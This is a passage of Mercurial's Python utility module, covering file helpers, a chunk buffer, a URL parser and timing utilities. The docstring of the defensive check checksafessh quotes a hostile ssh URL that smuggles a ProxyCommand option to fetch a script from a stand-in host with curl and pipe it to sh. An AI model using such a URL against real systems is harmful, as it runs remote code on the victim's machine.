2286 2286
2287 2287 Newly created directories are marked as "not to be indexed by
2288 2288 the content indexing service", if ``notindexed`` is specified
2289 2289 for "write" mode access.
2290 2290 """
2291 2291 try:
2292 2292 makedir(name, notindexed)
2293 2293 except OSError as err:
2294 2294 if err.errno == errno.EEXIST:
2295 2295 return
2296 2296 if err.errno != errno.ENOENT or not name:
2297 2297 raise
2298 2298 parent = os.path.dirname(os.path.abspath(name))
2299 2299 if parent == name:
2300 2300 raise
2301 2301 makedirs(parent, mode, notindexed)
2302 2302 try:
2303 2303 makedir(name, notindexed)
2304 2304 except OSError as err:
2305 2305 # Catch EEXIST to handle races
2306 2306 if err.errno == errno.EEXIST:
2307 2307 return
2308 2308 raise
2309 2309 if mode is not None:
2310 2310 os.chmod(name, mode)
2311 2311
2312 2312 def readfile(path):
2313 2313 with open(path, 'rb') as fp:
2314 2314 return fp.read()
2315 2315
2316 2316 def writefile(path, text):
2317 2317 with open(path, 'wb') as fp:
2318 2318 fp.write(text)
2319 2319
2320 2320 def appendfile(path, text):
2321 2321 with open(path, 'ab') as fp:
2322 2322 fp.write(text)
2323 2323
2324 2324 class chunkbuffer(object):
2325 2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 2326 iterator over chunks of arbitrary size."""
2327 2327
2328 2328 def __init__(self, in_iter):
2329 2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 2330 def splitbig(chunks):
2331 2331 for chunk in chunks:
2332 2332 if len(chunk) > 2**20:
2333 2333 pos = 0
2334 2334 while pos < len(chunk):
2335 2335 end = pos + 2 ** 18
2336 2336 yield chunk[pos:end]
2337 2337 pos = end
2338 2338 else:
2339 2339 yield chunk
2340 2340 self.iter = splitbig(in_iter)
2341 2341 self._queue = collections.deque()
2342 2342 self._chunkoffset = 0
2343 2343
2344 2344 def read(self, l=None):
2345 2345 """Read L bytes of data from the iterator of chunks of data.
2346 2346 Returns less than L bytes if the iterator runs dry.
2347 2347
2348 2348 If size parameter is omitted, read everything"""
2349 2349 if l is None:
2350 2350 return ''.join(self.iter)
2351 2351
2352 2352 left = l
2353 2353 buf = []
2354 2354 queue = self._queue
2355 2355 while left > 0:
2356 2356 # refill the queue
2357 2357 if not queue:
2358 2358 target = 2**18
2359 2359 for chunk in self.iter:
2360 2360 queue.append(chunk)
2361 2361 target -= len(chunk)
2362 2362 if target <= 0:
2363 2363 break
2364 2364 if not queue:
2365 2365 break
2366 2366
2367 2367 # The easy way to do this would be to queue.popleft(), modify the
2368 2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 2369 # where we read partial chunk content, this incurs 2 dequeue
2370 2370 # mutations and creates a new str for the remaining chunk in the
2371 2371 # queue. Our code below avoids this overhead.
2372 2372
2373 2373 chunk = queue[0]
2374 2374 chunkl = len(chunk)
2375 2375 offset = self._chunkoffset
2376 2376
2377 2377 # Use full chunk.
2378 2378 if offset == 0 and left >= chunkl:
2379 2379 left -= chunkl
2380 2380 queue.popleft()
2381 2381 buf.append(chunk)
2382 2382 # self._chunkoffset remains at 0.
2383 2383 continue
2384 2384
2385 2385 chunkremaining = chunkl - offset
2386 2386
2387 2387 # Use all of unconsumed part of chunk.
2388 2388 if left >= chunkremaining:
2389 2389 left -= chunkremaining
2390 2390 queue.popleft()
2391 2391 # offset == 0 is enabled by block above, so this won't merely
2392 2392 # copy via ``chunk[0:]``.
2393 2393 buf.append(chunk[offset:])
2394 2394 self._chunkoffset = 0
2395 2395
2396 2396 # Partial chunk needed.
2397 2397 else:
2398 2398 buf.append(chunk[offset:offset + left])
2399 2399 self._chunkoffset += left
2400 2400 left -= chunkremaining
2401 2401
2402 2402 return ''.join(buf)
2403 2403
2404 2404 def filechunkiter(f, size=131072, limit=None):
2405 2405 """Create a generator that produces the data in the file size
2406 2406 (default 131072) bytes at a time, up to optional limit (default is
2407 2407 to read all data). Chunks may be less than size bytes if the
2408 2408 chunk is the last chunk in the file, or the file is a socket or
2409 2409 some other type of file that sometimes reads less data than is
2410 2410 requested."""
2411 2411 assert size >= 0
2412 2412 assert limit is None or limit >= 0
2413 2413 while True:
2414 2414 if limit is None:
2415 2415 nbytes = size
2416 2416 else:
2417 2417 nbytes = min(limit, size)
2418 2418 s = nbytes and f.read(nbytes)
2419 2419 if not s:
2420 2420 break
2421 2421 if limit:
2422 2422 limit -= len(s)
2423 2423 yield s
2424 2424
2425 2425 class cappedreader(object):
2426 2426 """A file object proxy that allows reading up to N bytes.
2427 2427
2428 2428 Given a source file object, instances of this type allow reading up to
2429 2429 N bytes from that source file object. Attempts to read past the allowed
2430 2430 limit are treated as EOF.
2431 2431
2432 2432 It is assumed that I/O is not performed on the original file object
2433 2433 in addition to I/O that is performed by this instance. If there is,
2434 2434 state tracking will get out of sync and unexpected results will ensue.
2435 2435 """
2436 2436 def __init__(self, fh, limit):
2437 2437 """Allow reading up to <limit> bytes from <fh>."""
2438 2438 self._fh = fh
2439 2439 self._left = limit
2440 2440
2441 2441 def read(self, n=-1):
2442 2442 if not self._left:
2443 2443 return b''
2444 2444
2445 2445 if n < 0:
2446 2446 n = self._left
2447 2447
2448 2448 data = self._fh.read(min(n, self._left))
2449 2449 self._left -= len(data)
2450 2450 assert self._left >= 0
2451 2451
2452 2452 return data
2453 2453
2454 2454 def readinto(self, b):
2455 2455 res = self.read(len(b))
2456 2456 if res is None:
2457 2457 return None
2458 2458
2459 2459 b[0:len(res)] = res
2460 2460 return len(res)
2461 2461
2462 2462 def unitcountfn(*unittable):
2463 2463 '''return a function that renders a readable count of some quantity'''
2464 2464
2465 2465 def go(count):
2466 2466 for multiplier, divisor, format in unittable:
2467 2467 if abs(count) >= divisor * multiplier:
2468 2468 return format % (count / float(divisor))
2469 2469 return unittable[-1][2] % count
2470 2470
2471 2471 return go
2472 2472
2473 2473 def processlinerange(fromline, toline):
2474 2474 """Check that linerange <fromline>:<toline> makes sense and return a
2475 2475 0-based range.
2476 2476
2477 2477 >>> processlinerange(10, 20)
2478 2478 (9, 20)
2479 2479 >>> processlinerange(2, 1)
2480 2480 Traceback (most recent call last):
2481 2481 ...
2482 2482 ParseError: line range must be positive
2483 2483 >>> processlinerange(0, 5)
2484 2484 Traceback (most recent call last):
2485 2485 ...
2486 2486 ParseError: fromline must be strictly positive
2487 2487 """
2488 2488 if toline - fromline < 0:
2489 2489 raise error.ParseError(_("line range must be positive"))
2490 2490 if fromline < 1:
2491 2491 raise error.ParseError(_("fromline must be strictly positive"))
2492 2492 return fromline - 1, toline
2493 2493
2494 2494 bytecount = unitcountfn(
2495 2495 (100, 1 << 30, _('%.0f GB')),
2496 2496 (10, 1 << 30, _('%.1f GB')),
2497 2497 (1, 1 << 30, _('%.2f GB')),
2498 2498 (100, 1 << 20, _('%.0f MB')),
2499 2499 (10, 1 << 20, _('%.1f MB')),
2500 2500 (1, 1 << 20, _('%.2f MB')),
2501 2501 (100, 1 << 10, _('%.0f KB')),
2502 2502 (10, 1 << 10, _('%.1f KB')),
2503 2503 (1, 1 << 10, _('%.2f KB')),
2504 2504 (1, 1, _('%.0f bytes')),
2505 2505 )
2506 2506
2507 2507 class transformingwriter(object):
2508 2508 """Writable file wrapper to transform data by function"""
2509 2509
2510 2510 def __init__(self, fp, encode):
2511 2511 self._fp = fp
2512 2512 self._encode = encode
2513 2513
2514 2514 def close(self):
2515 2515 self._fp.close()
2516 2516
2517 2517 def flush(self):
2518 2518 self._fp.flush()
2519 2519
2520 2520 def write(self, data):
2521 2521 return self._fp.write(self._encode(data))
2522 2522
2523 2523 # Matches a single EOL which can either be a CRLF where repeated CR
2524 2524 # are removed or a LF. We do not care about old Macintosh files, so a
2525 2525 # stray CR is an error.
2526 2526 _eolre = remod.compile(br'\r*\n')
2527 2527
2528 2528 def tolf(s):
2529 2529 return _eolre.sub('\n', s)
2530 2530
2531 2531 def tocrlf(s):
2532 2532 return _eolre.sub('\r\n', s)
2533 2533
2534 2534 def _crlfwriter(fp):
2535 2535 return transformingwriter(fp, tocrlf)
2536 2536
2537 2537 if pycompat.oslinesep == '\r\n':
2538 2538 tonativeeol = tocrlf
2539 2539 fromnativeeol = tolf
2540 2540 nativeeolwriter = _crlfwriter
2541 2541 else:
2542 2542 tonativeeol = pycompat.identity
2543 2543 fromnativeeol = pycompat.identity
2544 2544 nativeeolwriter = pycompat.identity
2545 2545
2546 2546 if (pyplatform.python_implementation() == 'CPython' and
2547 2547 sys.version_info < (3, 0)):
2548 2548 # There is an issue in CPython that some IO methods do not handle EINTR
2549 2549 # correctly. The following table shows what CPython version (and functions)
2550 2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2551 2551 #
2552 2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2553 2553 # --------------------------------------------------
2554 2554 # fp.__iter__ | buggy | buggy | okay
2555 2555 # fp.read* | buggy | okay [1] | okay
2556 2556 #
2557 2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2558 2558 #
2559 2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2560 2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2561 2561 #
2562 2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2563 2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2564 2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2565 2565 # fp.__iter__ but not other fp.read* methods.
2566 2566 #
2567 2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2568 2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2569 2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2570 2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2571 2571 # to minimize the performance impact.
2572 2572 if sys.version_info >= (2, 7, 4):
2573 2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2574 2574 def _safeiterfile(fp):
2575 2575 return iter(fp.readline, '')
2576 2576 else:
2577 2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2578 2578 # note: this may block longer than necessary because of bufsize.
2579 2579 def _safeiterfile(fp, bufsize=4096):
2580 2580 fd = fp.fileno()
2581 2581 line = ''
2582 2582 while True:
2583 2583 try:
2584 2584 buf = os.read(fd, bufsize)
2585 2585 except OSError as ex:
2586 2586 # os.read only raises EINTR before any data is read
2587 2587 if ex.errno == errno.EINTR:
2588 2588 continue
2589 2589 else:
2590 2590 raise
2591 2591 line += buf
2592 2592 if '\n' in buf:
2593 2593 splitted = line.splitlines(True)
2594 2594 line = ''
2595 2595 for l in splitted:
2596 2596 if l[-1] == '\n':
2597 2597 yield l
2598 2598 else:
2599 2599 line = l
2600 2600 if not buf:
2601 2601 break
2602 2602 if line:
2603 2603 yield line
2604 2604
2605 2605 def iterfile(fp):
2606 2606 fastpath = True
2607 2607 if type(fp) is file:
2608 2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2609 2609 if fastpath:
2610 2610 return fp
2611 2611 else:
2612 2612 return _safeiterfile(fp)
2613 2613 else:
2614 2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2615 2615 def iterfile(fp):
2616 2616 return fp
2617 2617
2618 2618 def iterlines(iterator):
2619 2619 for chunk in iterator:
2620 2620 for line in chunk.splitlines():
2621 2621 yield line
2622 2622
2623 2623 def expandpath(path):
2624 2624 return os.path.expanduser(os.path.expandvars(path))
2625 2625
2626 2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2627 2627 """Return the result of interpolating items in the mapping into string s.
2628 2628
2629 2629 prefix is a single character string, or a two character string with
2630 2630 a backslash as the first character if the prefix needs to be escaped in
2631 2631 a regular expression.
2632 2632
2633 2633 fn is an optional function that will be applied to the replacement text
2634 2634 just before replacement.
2635 2635
2636 2636 escape_prefix is an optional flag that allows using doubled prefix for
2637 2637 its escaping.
2638 2638 """
2639 2639 fn = fn or (lambda s: s)
2640 2640 patterns = '|'.join(mapping.keys())
2641 2641 if escape_prefix:
2642 2642 patterns += '|' + prefix
2643 2643 if len(prefix) > 1:
2644 2644 prefix_char = prefix[1:]
2645 2645 else:
2646 2646 prefix_char = prefix
2647 2647 mapping[prefix_char] = prefix_char
2648 2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2649 2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2650 2650
2651 2651 def getport(port):
2652 2652 """Return the port for a given network service.
2653 2653
2654 2654 If port is an integer, it's returned as is. If it's a string, it's
2655 2655 looked up using socket.getservbyname(). If there's no matching
2656 2656 service, error.Abort is raised.
2657 2657 """
2658 2658 try:
2659 2659 return int(port)
2660 2660 except ValueError:
2661 2661 pass
2662 2662
2663 2663 try:
2664 2664 return socket.getservbyname(pycompat.sysstr(port))
2665 2665 except socket.error:
2666 2666 raise error.Abort(_("no port number associated with service '%s'")
2667 2667 % port)
2668 2668
2669 2669 class url(object):
2670 2670 r"""Reliable URL parser.
2671 2671
2672 2672 This parses URLs and provides attributes for the following
2673 2673 components:
2674 2674
2675 2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2676 2676
2677 2677 Missing components are set to None. The only exception is
2678 2678 fragment, which is set to '' if present but empty.
2679 2679
2680 2680 If parsefragment is False, fragment is included in query. If
2681 2681 parsequery is False, query is included in path. If both are
2682 2682 False, both fragment and query are included in path.
2683 2683
2684 2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2685 2685
2686 2686 Note that for backward compatibility reasons, bundle URLs do not
2687 2687 take host names. That means 'bundle://../' has a path of '../'.
2688 2688
2689 2689 Examples:
2690 2690
2691 2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2692 2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2693 2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2694 2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2695 2695 >>> url(b'file:///home/joe/repo')
2696 2696 <url scheme: 'file', path: '/home/joe/repo'>
2697 2697 >>> url(b'file:///c:/temp/foo/')
2698 2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2699 2699 >>> url(b'bundle:foo')
2700 2700 <url scheme: 'bundle', path: 'foo'>
2701 2701 >>> url(b'bundle://../foo')
2702 2702 <url scheme: 'bundle', path: '../foo'>
2703 2703 >>> url(br'c:\foo\bar')
2704 2704 <url path: 'c:\\foo\\bar'>
2705 2705 >>> url(br'\\blah\blah\blah')
2706 2706 <url path: '\\\\blah\\blah\\blah'>
2707 2707 >>> url(br'\\blah\blah\blah#baz')
2708 2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2709 2709 >>> url(br'file:///C:\users\me')
2710 2710 <url scheme: 'file', path: 'C:\\users\\me'>
2711 2711
2712 2712 Authentication credentials:
2713 2713
2714 2714 >>> url(b'ssh://joe:xyz@x/repo')
2715 2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2716 2716 >>> url(b'ssh://joe@x/repo')
2717 2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2718 2718
2719 2719 Query strings and fragments:
2720 2720
2721 2721 >>> url(b'http://host/a?b#c')
2722 2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2723 2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2724 2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2725 2725
2726 2726 Empty path:
2727 2727
2728 2728 >>> url(b'')
2729 2729 <url path: ''>
2730 2730 >>> url(b'#a')
2731 2731 <url path: '', fragment: 'a'>
2732 2732 >>> url(b'http://host/')
2733 2733 <url scheme: 'http', host: 'host', path: ''>
2734 2734 >>> url(b'http://host/#a')
2735 2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2736 2736
2737 2737 Only scheme:
2738 2738
2739 2739 >>> url(b'http:')
2740 2740 <url scheme: 'http'>
2741 2741 """
2742 2742
2743 2743 _safechars = "!~*'()+"
2744 2744 _safepchars = "/!~*'()+:\\"
2745 2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2746 2746
2747 2747 def __init__(self, path, parsequery=True, parsefragment=True):
2748 2748 # We slowly chomp away at path until we have only the path left
2749 2749 self.scheme = self.user = self.passwd = self.host = None
2750 2750 self.port = self.path = self.query = self.fragment = None
2751 2751 self._localpath = True
2752 2752 self._hostport = ''
2753 2753 self._origpath = path
2754 2754
2755 2755 if parsefragment and '#' in path:
2756 2756 path, self.fragment = path.split('#', 1)
2757 2757
2758 2758 # special case for Windows drive letters and UNC paths
2759 2759 if hasdriveletter(path) or path.startswith('\\\\'):
2760 2760 self.path = path
2761 2761 return
2762 2762
2763 2763 # For compatibility reasons, we can't handle bundle paths as
2764 2764 # normal URLS
2765 2765 if path.startswith('bundle:'):
2766 2766 self.scheme = 'bundle'
2767 2767 path = path[7:]
2768 2768 if path.startswith('//'):
2769 2769 path = path[2:]
2770 2770 self.path = path
2771 2771 return
2772 2772
2773 2773 if self._matchscheme(path):
2774 2774 parts = path.split(':', 1)
2775 2775 if parts[0]:
2776 2776 self.scheme, path = parts
2777 2777 self._localpath = False
2778 2778
2779 2779 if not path:
2780 2780 path = None
2781 2781 if self._localpath:
2782 2782 self.path = ''
2783 2783 return
2784 2784 else:
2785 2785 if self._localpath:
2786 2786 self.path = path
2787 2787 return
2788 2788
2789 2789 if parsequery and '?' in path:
2790 2790 path, self.query = path.split('?', 1)
2791 2791 if not path:
2792 2792 path = None
2793 2793 if not self.query:
2794 2794 self.query = None
2795 2795
2796 2796 # // is required to specify a host/authority
2797 2797 if path and path.startswith('//'):
2798 2798 parts = path[2:].split('/', 1)
2799 2799 if len(parts) > 1:
2800 2800 self.host, path = parts
2801 2801 else:
2802 2802 self.host = parts[0]
2803 2803 path = None
2804 2804 if not self.host:
2805 2805 self.host = None
2806 2806 # path of file:///d is /d
2807 2807 # path of file:///d:/ is d:/, not /d:/
2808 2808 if path and not hasdriveletter(path):
2809 2809 path = '/' + path
2810 2810
2811 2811 if self.host and '@' in self.host:
2812 2812 self.user, self.host = self.host.rsplit('@', 1)
2813 2813 if ':' in self.user:
2814 2814 self.user, self.passwd = self.user.split(':', 1)
2815 2815 if not self.host:
2816 2816 self.host = None
2817 2817
2818 2818 # Don't split on colons in IPv6 addresses without ports
2819 2819 if (self.host and ':' in self.host and
2820 2820 not (self.host.startswith('[') and self.host.endswith(']'))):
2821 2821 self._hostport = self.host
2822 2822 self.host, self.port = self.host.rsplit(':', 1)
2823 2823 if not self.host:
2824 2824 self.host = None
2825 2825
2826 2826 if (self.host and self.scheme == 'file' and
2827 2827 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2828 2828 raise error.Abort(_('file:// URLs can only refer to localhost'))
2829 2829
2830 2830 self.path = path
2831 2831
2832 2832 # leave the query string escaped
2833 2833 for a in ('user', 'passwd', 'host', 'port',
2834 2834 'path', 'fragment'):
2835 2835 v = getattr(self, a)
2836 2836 if v is not None:
2837 2837 setattr(self, a, urlreq.unquote(v))
2838 2838
2839 2839 @encoding.strmethod
2840 2840 def __repr__(self):
2841 2841 attrs = []
2842 2842 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2843 2843 'query', 'fragment'):
2844 2844 v = getattr(self, a)
2845 2845 if v is not None:
2846 2846 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2847 2847 return '<url %s>' % ', '.join(attrs)
2848 2848
2849 2849 def __bytes__(self):
2850 2850 r"""Join the URL's components back into a URL string.
2851 2851
2852 2852 Examples:
2853 2853
2854 2854 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2855 2855 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2856 2856 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2857 2857 'http://user:pw@host:80/?foo=bar&baz=42'
2858 2858 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2859 2859 'http://user:pw@host:80/?foo=bar%3dbaz'
2860 2860 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2861 2861 'ssh://user:pw@[::1]:2200//home/joe#'
2862 2862 >>> bytes(url(b'http://localhost:80//'))
2863 2863 'http://localhost:80//'
2864 2864 >>> bytes(url(b'http://localhost:80/'))
2865 2865 'http://localhost:80/'
2866 2866 >>> bytes(url(b'http://localhost:80'))
2867 2867 'http://localhost:80/'
2868 2868 >>> bytes(url(b'bundle:foo'))
2869 2869 'bundle:foo'
2870 2870 >>> bytes(url(b'bundle://../foo'))
2871 2871 'bundle:../foo'
2872 2872 >>> bytes(url(b'path'))
2873 2873 'path'
2874 2874 >>> bytes(url(b'file:///tmp/foo/bar'))
2875 2875 'file:///tmp/foo/bar'
2876 2876 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2877 2877 'file:///c:/tmp/foo/bar'
2878 2878 >>> print(url(br'bundle:foo\bar'))
2879 2879 bundle:foo\bar
2880 2880 >>> print(url(br'file:///D:\data\hg'))
2881 2881 file:///D:\data\hg
2882 2882 """
2883 2883 if self._localpath:
2884 2884 s = self.path
2885 2885 if self.scheme == 'bundle':
2886 2886 s = 'bundle:' + s
2887 2887 if self.fragment:
2888 2888 s += '#' + self.fragment
2889 2889 return s
2890 2890
2891 2891 s = self.scheme + ':'
2892 2892 if self.user or self.passwd or self.host:
2893 2893 s += '//'
2894 2894 elif self.scheme and (not self.path or self.path.startswith('/')
2895 2895 or hasdriveletter(self.path)):
2896 2896 s += '//'
2897 2897 if hasdriveletter(self.path):
2898 2898 s += '/'
2899 2899 if self.user:
2900 2900 s += urlreq.quote(self.user, safe=self._safechars)
2901 2901 if self.passwd:
2902 2902 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2903 2903 if self.user or self.passwd:
2904 2904 s += '@'
2905 2905 if self.host:
2906 2906 if not (self.host.startswith('[') and self.host.endswith(']')):
2907 2907 s += urlreq.quote(self.host)
2908 2908 else:
2909 2909 s += self.host
2910 2910 if self.port:
2911 2911 s += ':' + urlreq.quote(self.port)
2912 2912 if self.host:
2913 2913 s += '/'
2914 2914 if self.path:
2915 2915 # TODO: similar to the query string, we should not unescape the
2916 2916 # path when we store it, the path might contain '%2f' = '/',
2917 2917 # which we should *not* escape.
2918 2918 s += urlreq.quote(self.path, safe=self._safepchars)
2919 2919 if self.query:
2920 2920 # we store the query in escaped form.
2921 2921 s += '?' + self.query
2922 2922 if self.fragment is not None:
2923 2923 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2924 2924 return s
2925 2925
2926 2926 __str__ = encoding.strmethod(__bytes__)
2927 2927
2928 2928 def authinfo(self):
2929 2929 user, passwd = self.user, self.passwd
2930 2930 try:
2931 2931 self.user, self.passwd = None, None
2932 2932 s = bytes(self)
2933 2933 finally:
2934 2934 self.user, self.passwd = user, passwd
2935 2935 if not self.user:
2936 2936 return (s, None)
2937 2937 # authinfo[1] is passed to urllib2 password manager, and its
2938 2938 # URIs must not contain credentials. The host is passed in the
2939 2939 # URIs list because Python < 2.4.3 uses only that to search for
2940 2940 # a password.
2941 2941 return (s, (None, (s, self.host),
2942 2942 self.user, self.passwd or ''))
2943 2943
2944 2944 def isabs(self):
2945 2945 if self.scheme and self.scheme != 'file':
2946 2946 return True # remote URL
2947 2947 if hasdriveletter(self.path):
2948 2948 return True # absolute for our purposes - can't be joined()
2949 2949 if self.path.startswith(br'\\'):
2950 2950 return True # Windows UNC path
2951 2951 if self.path.startswith('/'):
2952 2952 return True # POSIX-style
2953 2953 return False
2954 2954
2955 2955 def localpath(self):
2956 2956 if self.scheme == 'file' or self.scheme == 'bundle':
2957 2957 path = self.path or '/'
2958 2958 # For Windows, we need to promote hosts containing drive
2959 2959 # letters to paths with drive letters.
2960 2960 if hasdriveletter(self._hostport):
2961 2961 path = self._hostport + '/' + self.path
2962 2962 elif (self.host is not None and self.path
2963 2963 and not hasdriveletter(path)):
2964 2964 path = '/' + path
2965 2965 return path
2966 2966 return self._origpath
2967 2967
2968 2968 def islocal(self):
2969 2969 '''whether localpath will return something that posixfile can open'''
2970 2970 return (not self.scheme or self.scheme == 'file'
2971 2971 or self.scheme == 'bundle')
2972 2972
2973 2973 def hasscheme(path):
2974 2974 return bool(url(path).scheme)
2975 2975
2976 2976 def hasdriveletter(path):
2977 2977 return path and path[1:2] == ':' and path[0:1].isalpha()
2978 2978
2979 2979 def urllocalpath(path):
2980 2980 return url(path, parsequery=False, parsefragment=False).localpath()
2981 2981
2982 2982 def checksafessh(path):
2983 2983 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2984 2984
2985 2985 This is a sanity check for ssh urls. ssh will parse the first item as
2986 2986 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2987 2987 Let's prevent these potentially exploited urls entirely and warn the
2988 2988 user.
2989 2989
2990 2990 Raises an error.Abort when the url is unsafe.
2991 2991 """
2992 2992 path = urlreq.unquote(path)
2993 2993 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2994 2994 raise error.Abort(_('potentially unsafe url: %r') %
2995 2995 (pycompat.bytestr(path),))
2996 2996
2997 2997 def hidepassword(u):
2998 2998 '''hide user credential in a url string'''
2999 2999 u = url(u)
3000 3000 if u.passwd:
3001 3001 u.passwd = '***'
3002 3002 return bytes(u)
3003 3003
3004 3004 def removeauth(u):
3005 3005 '''remove all authentication information from a url string'''
3006 3006 u = url(u)
3007 3007 u.user = u.passwd = None
3008 3008 return bytes(u)
3009 3009
3010 3010 timecount = unitcountfn(
3011 3011 (1, 1e3, _('%.0f s')),
3012 3012 (100, 1, _('%.1f s')),
3013 3013 (10, 1, _('%.2f s')),
3014 3014 (1, 1, _('%.3f s')),
3015 3015 (100, 0.001, _('%.1f ms')),
3016 3016 (10, 0.001, _('%.2f ms')),
3017 3017 (1, 0.001, _('%.3f ms')),
3018 3018 (100, 0.000001, _('%.1f us')),
3019 3019 (10, 0.000001, _('%.2f us')),
3020 3020 (1, 0.000001, _('%.3f us')),
3021 3021 (100, 0.000000001, _('%.1f ns')),
3022 3022 (10, 0.000000001, _('%.2f ns')),
3023 3023 (1, 0.000000001, _('%.3f ns')),
3024 3024 )
3025 3025
3026 3026 @attr.s
3027 3027 class timedcmstats(object):
3028 3028 """Stats information produced by the timedcm context manager on entering."""
3029 3029
3030 3030 # the starting value of the timer as a float (meaning and resulution is
3031 3031 # platform dependent, see util.timer)
3032 3032 start = attr.ib(default=attr.Factory(lambda: timer()))
3033 3033 # the number of seconds as a floating point value; starts at 0, updated when
3034 3034 # the context is exited.
3035 3035 elapsed = attr.ib(default=0)
3036 3036 # the number of nested timedcm context managers.
3037 3037 level = attr.ib(default=1)
3038 3038
3039 3039 def __bytes__(self):
3040 3040 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3041 3041
3042 3042 __str__ = encoding.strmethod(__bytes__)
3043 3043
3044 3044 @contextlib.contextmanager
3045 3045 def timedcm(whencefmt, *whenceargs):
3046 3046 """A context manager that produces timing information for a given context.
3047 3047
3048 3048 On entering a timedcmstats instance is produced.
3049 3049
3050 3050 This context manager is reentrant.
3051 3051
3052 3052 """
3053 3053 # track nested context managers
3054 3054 timedcm._nested += 1
3055 3055 timing_stats = timedcmstats(level=timedcm._nested)
3056 3056 try:
3057 3057 with tracing.log(whencefmt, *whenceargs):
3058 3058 yield timing_stats
3059 3059 finally:
3060 3060 timing_stats.elapsed = timer() - timing_stats.start
3061 3061 timedcm._nested -= 1
3062 3062
3063 3063 timedcm._nested = 0
3064 3064
3065 3065 def timed(func):
3066 3066 '''Report the execution time of a function call to stderr.
3067 3067
3068 3068 During development, use as a decorator when you need to measure
3069 3069 the cost of a function, e.g. as follows:
3070 3070
3071 3071 @util.timed
3072 3072 def foo(a, b, c):
3073 3073 pass
3074 3074 '''
3075 3075
3076 3076 def wrapper(*args, **kwargs):
3077 3077 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3078 3078 result = func(*args, **kwargs)
3079 3079 stderr = procutil.stderr
3080 3080 stderr.write('%s%s: %s\n' % (
3081 3081 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3082 3082 time_stats))
3083 3083 return result
3084 3084 return wrapper
3085 3085
3086 3086 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3087 3087 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3088 3088
3089 3089 def sizetoint(s):
3090 3090 '''Convert a space specifier to a byte count.
3091 3091
3092 3092 >>> sizetoint(b'30')
3093 3093 30
3094 3094 >>> sizetoint(b'2.2kb')
3095 3095 2252
3096 3096 >>> sizetoint(b'6M')
3097 3097 6291456
3098 3098 '''
3099 3099 t = s.strip().lower()
3100 3100 try:
3101 3101 for k, u in _sizeunits:
3102 3102 if t.endswith(k):
3103 3103 return int(float(t[:-len(k)]) * u)
3104 3104 return int(t)
3105 3105 except ValueError:
3106 3106 raise error.ParseError(_("couldn't parse size: %s") % s)
3107 3107
3108 3108 class hooks(object):
3109 3109 '''A collection of hook functions that can be used to extend a
3110 3110 function's behavior. Hooks are called in lexicographic order,
3111 3111 based on the names of their sources.'''
3112 3112
3113 3113 def __init__(self):
3114 3114 self._hooks = []
3115 3115
3116 3116 def add(self, source, hook):
3117 3117 self._hooks.append((source, hook))
3118 3118
3119 3119 def __call__(self, *args):
3120 3120 self._hooks.sort(key=lambda x: x[0])
3121 3121 results = []
3122 3122 for source, hook in self._hooks:
3123 3123 results.append(hook(*args))
3124 3124 return results
3125 3125
3126 3126 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3127 3127 '''Yields lines for a nicely formatted stacktrace.
